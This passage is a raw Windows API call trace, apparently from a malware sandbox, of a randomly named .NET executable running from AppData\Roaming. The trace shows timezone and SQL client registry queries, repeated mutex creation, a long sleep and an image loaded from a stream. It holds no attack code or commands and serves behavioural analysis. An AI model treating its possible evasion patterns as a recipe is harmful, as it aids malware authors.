lpType=0x4dd3e0, lpData=0x2285b08, lpcbData=0x4dd3dc*=0x20 | out: lpType=0x4dd3e0*=0x1, lpData="@tzres.dll,-670", lpcbData=0x4dd3dc*=0x20) returned 0x0 [0159.225] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x4dd3e0, lpData=0x0, lpcbData=0x4dd3dc*=0x0 | out: lpType=0x4dd3e0*=0x1, lpData=0x0, lpcbData=0x4dd3dc*=0x20) returned 0x0 [0159.225] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x4dd3e0, lpData=0x2285b60, lpcbData=0x4dd3dc*=0x20 | out: lpType=0x4dd3e0*=0x1, lpData="@tzres.dll,-672", lpcbData=0x4dd3dc*=0x20) returned 0x0 [0159.225] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x4dd3e0, lpData=0x0, lpcbData=0x4dd3dc*=0x0 | out: lpType=0x4dd3e0*=0x1, lpData=0x0, lpcbData=0x4dd3dc*=0x20) returned 0x0 [0159.226] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x4dd3e0, lpData=0x2285bb8, lpcbData=0x4dd3dc*=0x20 | out: lpType=0x4dd3e0*=0x1, lpData="@tzres.dll,-671", lpcbData=0x4dd3dc*=0x20) returned 0x0 [0159.227] CoTaskMemAlloc (cb=0x20c) returned 0x7d2a50 [0159.227] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7d2a50 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0159.228] CoTaskMemFree (pv=0x7d2a50) [0159.229] CoTaskMemAlloc (cb=0x20c) returned 0x7d2a50 [0159.229] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x4dd3fc, pwszFileMUIPath=0x7d2a50, pcchFileMUIPath=0x4dd400, pululEnumerator=0x4dd3f4 | out: pwszLanguage=0x0, pcchLanguage=0x4dd3fc, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x4dd400, pululEnumerator=0x4dd3f4) returned 1 [0159.229] CoTaskMemFree (pv=0x0) [0159.229] CoTaskMemFree (pv=0x7d2a50) [0159.230] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3d0001 [0159.232] CoTaskMemAlloc (cb=0x3ec) returned 0x7da1e8 [0159.232] LoadStringW (in: hInstance=0x3d0001, uID=0x29e, lpBuffer=0x7da1e8, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0159.232] CoTaskMemFree (pv=0x7da1e8) [0159.232] FreeLibrary (hLibModule=0x3d0001) returned 1 [0159.233] CoTaskMemAlloc (cb=0x20c) returned 0x7d2c38 [0159.233] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7d2c38 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0159.233] CoTaskMemFree (pv=0x7d2c38) [0159.233] CoTaskMemAlloc (cb=0x20c) returned 0x7d2c38 [0159.233] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x4dd3fc, pwszFileMUIPath=0x7d2c38, pcchFileMUIPath=0x4dd400, pululEnumerator=0x4dd3f4 | out: pwszLanguage=0x0, pcchLanguage=0x4dd3fc, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x4dd400, pululEnumerator=0x4dd3f4) returned 1 [0159.234] CoTaskMemFree (pv=0x0) [0159.234] CoTaskMemFree (pv=0x7d2c38) [0159.234] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3d0001 [0159.234] CoTaskMemAlloc (cb=0x3ec) returned 0x7da1e8 [0159.235] LoadStringW (in: hInstance=0x3d0001, uID=0x2a0, lpBuffer=0x7da1e8, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0159.235] CoTaskMemFree (pv=0x7da1e8) [0159.235] FreeLibrary (hLibModule=0x3d0001) returned 1 [0159.235] CoTaskMemAlloc (cb=0x20c) returned 0x7d2c38 [0159.235] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7d2c38 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0159.235] CoTaskMemFree (pv=0x7d2c38) [0159.236] CoTaskMemAlloc (cb=0x20c) returned 0x7d2c38 [0159.236] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x4dd3fc, pwszFileMUIPath=0x7d2c38, pcchFileMUIPath=0x4dd400, pululEnumerator=0x4dd3f4 | out: pwszLanguage=0x0, pcchLanguage=0x4dd3fc, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x4dd400, pululEnumerator=0x4dd3f4) returned 1 [0159.236] CoTaskMemFree (pv=0x0) [0159.236] CoTaskMemFree (pv=0x7d2c38) [0159.236] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3d0001 [0159.237] CoTaskMemAlloc (cb=0x3ec) returned 0x7da1e8 [0159.237] LoadStringW (in: hInstance=0x3d0001, uID=0x29f, lpBuffer=0x7da1e8, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0159.237] CoTaskMemFree (pv=0x7da1e8) [0159.237] FreeLibrary (hLibModule=0x3d0001) returned 1 [0159.238] RegCloseKey (hKey=0x2cc) returned 0x0 [0159.239] GetCurrentProcessId () returned 0x678 [0159.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x678) returned 0x2cc [0159.241] GetProcessTimes (in: hProcess=0x2cc, lpCreationTime=0x4dd648, lpExitTime=0x4dd640, lpKernelTime=0x4dd640, lpUserTime=0x4dd640 | out: lpCreationTime=0x4dd648, lpExitTime=0x4dd640, lpKernelTime=0x4dd640, lpUserTime=0x4dd640) returned 1 [0159.241] CloseHandle (hObject=0x2cc) returned 1 [0159.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x530) returned 0x2cc [0159.241] GetProcessTimes (in: hProcess=0x2cc, lpCreationTime=0x4dd68c, lpExitTime=0x4dd684, lpKernelTime=0x4dd684, lpUserTime=0x4dd684 | out: lpCreationTime=0x4dd68c, lpExitTime=0x4dd684, lpKernelTime=0x4dd684, lpUserTime=0x4dd684) returned 1 [0159.241] CloseHandle (hObject=0x2cc) returned 1 [0159.241] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x530) returned 0x2cc [0159.242] GetCurrentProcess () returned 0xffffffff [0159.242] GetCurrentProcess () returned 0xffffffff [0159.242] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x4dd60c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x4dd60c*=0x2d8) returned 1 [0159.251] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x4dd604*=0x2d8, lpdwindex=0x4dd424 | out: lpdwindex=0x4dd424) returned 0x80010115 [0159.321] CloseHandle (hObject=0x2d8) returned 1 [0159.321] CloseHandle (hObject=0x2cc) returned 1 [0159.322] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.322] CloseHandle (hObject=0x2c4) returned 1 [0159.326] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2289888, cbSid=0x4dd6c8 | out: pSid=0x2289888*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.327] CreateMutexW (lpMutexAttributes=0x2289964, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.327] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.327] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.327] CloseHandle (hObject=0x2c4) returned 1 [0159.328] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228a0ac, cbSid=0x4dd6c8 | out: pSid=0x228a0ac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.328] CreateMutexW (lpMutexAttributes=0x228a188, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.328] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.328] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.328] CloseHandle (hObject=0x2c4) returned 1 [0159.328] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228a8c8, cbSid=0x4dd6c8 | out: pSid=0x228a8c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.329] CreateMutexW (lpMutexAttributes=0x228a9a4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.329] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.329] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.329] CloseHandle (hObject=0x2c4) returned 1 [0159.330] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228b0f8, cbSid=0x4dd6c8 | out: pSid=0x228b0f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.330] CreateMutexW (lpMutexAttributes=0x228b1d4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.330] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.330] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.330] CloseHandle (hObject=0x2c4) returned 1 [0159.331] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228b92c, cbSid=0x4dd6c8 | out: pSid=0x228b92c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.331] CreateMutexW (lpMutexAttributes=0x228ba08, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.331] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.331] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.331] CloseHandle (hObject=0x2c4) returned 1 [0159.331] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228c150, cbSid=0x4dd6c8 | out: pSid=0x228c150*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.331] CreateMutexW (lpMutexAttributes=0x228c22c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.332] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.332] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.332] CloseHandle (hObject=0x2c4) returned 1 [0159.332] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228c978, cbSid=0x4dd6c8 | out: pSid=0x228c978*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.332] CreateMutexW (lpMutexAttributes=0x228ca54, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.333] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.333] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.333] CloseHandle (hObject=0x2c4) returned 1 [0159.333] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228d194, cbSid=0x4dd6c8 | out: pSid=0x228d194*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.333] CreateMutexW (lpMutexAttributes=0x228d270, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.333] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.333] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.334] CloseHandle (hObject=0x2c4) returned 1 [0159.334] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x228d9b8, cbSid=0x4dd6c8 | out: pSid=0x228d9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x4dd6c8) returned 1 [0159.334] CreateMutexW (lpMutexAttributes=0x228da94, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0159.334] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0159.335] ReleaseMutex (hMutex=0x2c4) returned 1 [0159.335] CloseHandle (hObject=0x2c4) returned 1 [0159.353] GetCurrentProcess () returned 0xffffffff [0159.354] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dd3c4 | out: TokenHandle=0x4dd3c4*=0x2c4) returned 1 [0159.365] GetCurrentProcess () returned 0xffffffff [0159.365] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dd3d4 | out: TokenHandle=0x4dd3d4*=0x2cc) returned 1 [0159.379] EtwEventRegister () returned 0x0 [0159.399] GetModuleHandleW (lpModuleName=0x0) returned 0x20000 [0159.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="_______SQL______Process______Available@0", cchWideChar=40, lpMultiByteStr=0x4de41c, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x4de3d8 | out: lpMultiByteStr="_______SQL______Process______Available@0,S)ofI\r\x9b\x94Â5t4æM", lpUsedDefaultChar=0x4de3d8) returned 40 [0159.400] GetProcAddress (hModule=0x20000, lpProcName="_______SQL______Process______Available@0") returned 0x0 [0159.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="______SQL______Process______Available", cchWideChar=37, lpMultiByteStr=0x4de420, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x4de3dc | out: lpMultiByteStr="______SQL______Process______AvailableS)ofI\r\x9b\x94Â5t4æM", lpUsedDefaultChar=0x4de3dc) returned 37 [0159.400] GetProcAddress (hModule=0x20000, lpProcName="______SQL______Process______Available") returned 0x0 [0159.404] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x4deb08 | out: phkResult=0x4deb08*=0x0) returned 0x2 [0159.405] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", nBufferLength=0x105, lpBuffer=0x4de5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpFilePart=0x0) returned 0x2e [0159.407] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Hospital.mdf", nBufferLength=0x105, lpBuffer=0x4de654, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Hospital.mdf", lpFilePart=0x0) returned 0x3a [0159.408] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", ulOptions=0x0, samDesired=0x20019, phkResult=0x4deae8 | out: phkResult=0x4deae8*=0x0) returned 0x2 [0159.439] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x4dea84 | out: phkResult=0x4dea84*=0x0) returned 0x2 [0159.471] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0159.473] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73390000 [0159.481] AdjustWindowRectEx (in: lpRect=0x4dee00, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x4dee00) returned 1 [0159.483] GetCurrentProcess () returned 0xffffffff [0159.484] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x4ded18, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x4ded18*=0x328) returned 1 [0159.498] GetCurrentActCtx (in: lphActCtx=0x4dec78 | out: lphActCtx=0x4dec78*=0x0) returned 1 [0159.498] ActivateActCtx (in: hActCtx=0x79875c, lpCookie=0x4dec88 | out: hActCtx=0x79875c, lpCookie=0x4dec88) returned 1 [0159.498] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0159.500] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x72ee0000 [0159.507] GetModuleHandleW (lpModuleName="user32.dll") returned 0x75b00000 [0159.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x4deb40, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW\"pfI\r\x9b\x94Â5t", lpUsedDefaultChar=0x0) returned 14 [0159.507] GetProcAddress (hModule=0x75b00000, lpProcName="DefWindowProcW") returned 0x76fd25dd [0159.508] GetStockObject (i=5) returned 0x1900015 [0159.510] GetModuleHandleW (lpModuleName=0x0) returned 0x20000 [0159.513] CoTaskMemAlloc (cb=0x5a) returned 0x7cdb78 [0159.513] RegisterClassW (lpWndClass=0x4deb30) returned 0xc120 [0159.513] CoTaskMemFree (pv=0x7cdb78) [0159.513] GetModuleHandleW (lpModuleName=0x0) returned 0x20000 [0159.514] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.3917f2_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x20000, lpParam=0x0) returned 0x10156 [0159.514] SetWindowLongW (hWnd=0x10156, nIndex=-4, dwNewLong=1996301789) returned 80218262 [0159.515] GetWindowLongW (hWnd=0x10156, nIndex=-4) returned 1996301789 [0159.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4de440 | out: phkResult=0x4de440*=0x33c) returned 0x0 [0159.516] RegQueryValueExW (in: hKey=0x33c, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x4de460, lpData=0x0, lpcbData=0x4de45c*=0x0 | out: lpType=0x4de460*=0x0, lpData=0x0, lpcbData=0x4de45c*=0x0) returned 0x2 [0159.516] RegQueryValueExW (in: hKey=0x33c, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x4de460, lpData=0x0, lpcbData=0x4de45c*=0x0 | out: lpType=0x4de460*=0x0, lpData=0x0, lpcbData=0x4de45c*=0x0) returned 0x2 [0159.516] RegCloseKey (hKey=0x33c) returned 0x0 [0159.517] SetWindowLongW (hWnd=0x10156, nIndex=-4, dwNewLong=80218302) returned 1996301789 [0159.517] GetWindowLongW (hWnd=0x10156, nIndex=-4) returned 80218302 [0159.517] GetWindowLongW (hWnd=0x10156, nIndex=-16) returned 113311744 [0159.518] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc121 [0159.518] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc122 [0159.518] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x10156, Msg=0x81, wParam=0x0, lParam=0x4de70c) returned 0x1 [0159.519] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x10156, Msg=0x83, wParam=0x0, lParam=0x4de6f8) returned 0x0 [0159.519] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x10156, Msg=0x1, wParam=0x0, lParam=0x4de70c) returned 0x0 [0159.519] GetClientRect (in: hWnd=0x10156, lpRect=0x4de474 | out: lpRect=0x4de474) returned 1 [0159.519] GetWindowRect (in: hWnd=0x10156, lpRect=0x4de474 | out: lpRect=0x4de474) returned 1 [0159.520] GetParent (hWnd=0x10156) returned 0x0 [0159.520] DeactivateActCtx (dwFlags=0x0, ulCookie=0x13a80001) returned 1 [0159.680] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0159.681] AdjustWindowRectEx (in: lpRect=0x4dec5c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x4dec5c) returned 1 [0159.685] GetSystemDefaultLCID () returned 0x409 [0159.685] GetStockObject (i=17) returned 0x18a0025 [0159.688] GetObjectW (in: h=0x18a0025, c=92, pv=0x4dea18 | out: pv=0x4dea18) returned 92 [0159.690] GetDC (hWnd=0x0) returned 0xc0107b1 [0159.702] GdiplusStartup (in: token=0x1e6030, input=0x4ddfe8, output=0x4de038 | out: token=0x1e6030, output=0x4de038) returned 0x0 [0159.709] CoTaskMemAlloc (cb=0x5c) returned 0x7cdbe0 [0159.709] GdipCreateFontFromLogfontW (hdc=0xc0107b1, logfont=0x7cdbe0, font=0x4deae0) returned 0x0 [0159.811] CoTaskMemFree (pv=0x7cdbe0) [0159.812] CoTaskMemAlloc (cb=0x5c) returned 0x7cdbe0 [0159.812] CoTaskMemFree (pv=0x7cdbe0) [0159.812] CoTaskMemAlloc (cb=0x5c) returned 0x7cdbe0 [0159.813] CoTaskMemFree (pv=0x7cdbe0) [0159.813] GdipGetFontUnit (font=0x4372230, unit=0x4deaac) returned 0x0 [0159.813] GdipGetFontSize (font=0x4372230, size=0x4deab0) returned 0x0 [0159.813] GdipGetFontStyle (font=0x4372230, style=0x4deaa8) returned 0x0 [0159.814] GdipGetFamily (font=0x4372230, family=0x4deaa4) returned 0x0 [0159.814] GdipGetFontSize (font=0x4372230, size=0x22981ec) returned 0x0 [0159.814] ReleaseDC (hWnd=0x0, hDC=0xc0107b1) returned 1 [0159.815] GetDC (hWnd=0x0) returned 0x401015a [0159.815] GdipCreateFromHDC (hdc=0x401015a, graphics=0x4deacc) returned 0x0 [0159.816] GdipGetDpiY (graphics=0x57afcf0, dpi=0x22982f4) returned 0x0 [0159.816] GdipGetFontHeight (font=0x4372230, graphics=0x57afcf0, height=0x4deac4) returned 0x0 [0159.816] GdipGetEmHeight (family=0x437f6b8, style=0, EmHeight=0x4deacc) returned 0x0 [0159.816] GdipGetLineSpacing (family=0x437f6b8, style=0, LineSpacing=0x4deacc) returned 0x0 [0159.817] GdipDeleteGraphics (graphics=0x57afcf0) returned 0x0 [0159.817] ReleaseDC (hWnd=0x0, hDC=0x401015a) returned 1 [0159.817] GdipCreateFont (fontFamily=0x437f6b8, emSize=0x41040000, style=0, unit=0x3, font=0x22982b4) returned 0x0 [0159.817] GdipGetFontSize (font=0x5802940, size=0x22982b8) returned 0x0 [0159.818] GdipDeleteFont (font=0x4372230) returned 0x0 [0159.818] GetDC (hWnd=0x0) returned 0x401015a [0159.818] GdipCreateFromHDC (hdc=0x401015a, graphics=0x4deb30) returned 0x0 [0159.818] GdipGetFontHeight (font=0x5802940, graphics=0x57afcf0, height=0x4deb28) returned 0x0 [0159.818] GdipDeleteGraphics (graphics=0x57afcf0) returned 0x0 [0159.818] ReleaseDC (hWnd=0x0, hDC=0x401015a) returned 1 [0159.819] GetSystemMetrics (nIndex=5) returned 1 [0159.819] GetSystemMetrics (nIndex=6) returned 1 [0159.819] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0159.820] AdjustWindowRectEx (in: lpRect=0x4dec58, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x4dec58) returned 1 [0159.820] GetDC (hWnd=0x0) returned 0x401015a [0159.820] GdipCreateFromHDC (hdc=0x401015a, graphics=0x4deb30) returned 0x0 [0159.821] GdipGetFontHeight (font=0x5802940, graphics=0x57afcf0, height=0x4deb28) returned 0x0 [0159.821] GdipDeleteGraphics (graphics=0x57afcf0) returned 0x0 [0159.821] ReleaseDC (hWnd=0x0, hDC=0x401015a) returned 1 [0159.821] GetSystemMetrics (nIndex=5) returned 1 [0159.821] GetSystemMetrics (nIndex=6) returned 1 [0159.821] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0159.821] AdjustWindowRectEx (in: lpRect=0x4dec58, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x4dec58) returned 1 [0159.821] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0159.821] AdjustWindowRectEx (in: lpRect=0x4dec5c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x4dec5c) returned 1 [0159.822] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0159.822] AdjustWindowRectEx (in: lpRect=0x4dec5c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x4dec5c) returned 1 [0159.822] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0159.822] AdjustWindowRectEx (in: lpRect=0x4dec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x4dec58) returned 1 [0159.823] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0159.823] AdjustWindowRectEx (in: lpRect=0x4dec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x4dec58) returned 1 [0159.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0159.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4de9b0) returned 1 [0159.836] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x4dea2c | out: lpFileInformation=0x4dea2c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4de9ac) returned 1 [0160.281] SleepEx (dwMilliseconds=0xa21c, bAlertable=1) returned 0x0 [0174.621] GdipLoadImageFromStream (stream=0x5c0030, image=0x4ddcb0) returned 0x0 [0174.640] GdipImageForceValidation (image=0x57afcf0) returned 0x0 [0174.649] GdipGetImageType (image=0x57afcf0, type=0x4ddcac) returned 0x0 [0174.649] GdipGetImageRawFormat (image=0x57afcf0, format=0x4ddc30*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0174.686] GdipGetImageWidth (image=0x57afcf0, width=0x4de234) returned 0x0 [0174.688] GdipGetImageHeight (image=0x57afcf0, height=0x4de234) returned 0x0 [0174.696] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.696] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.697] 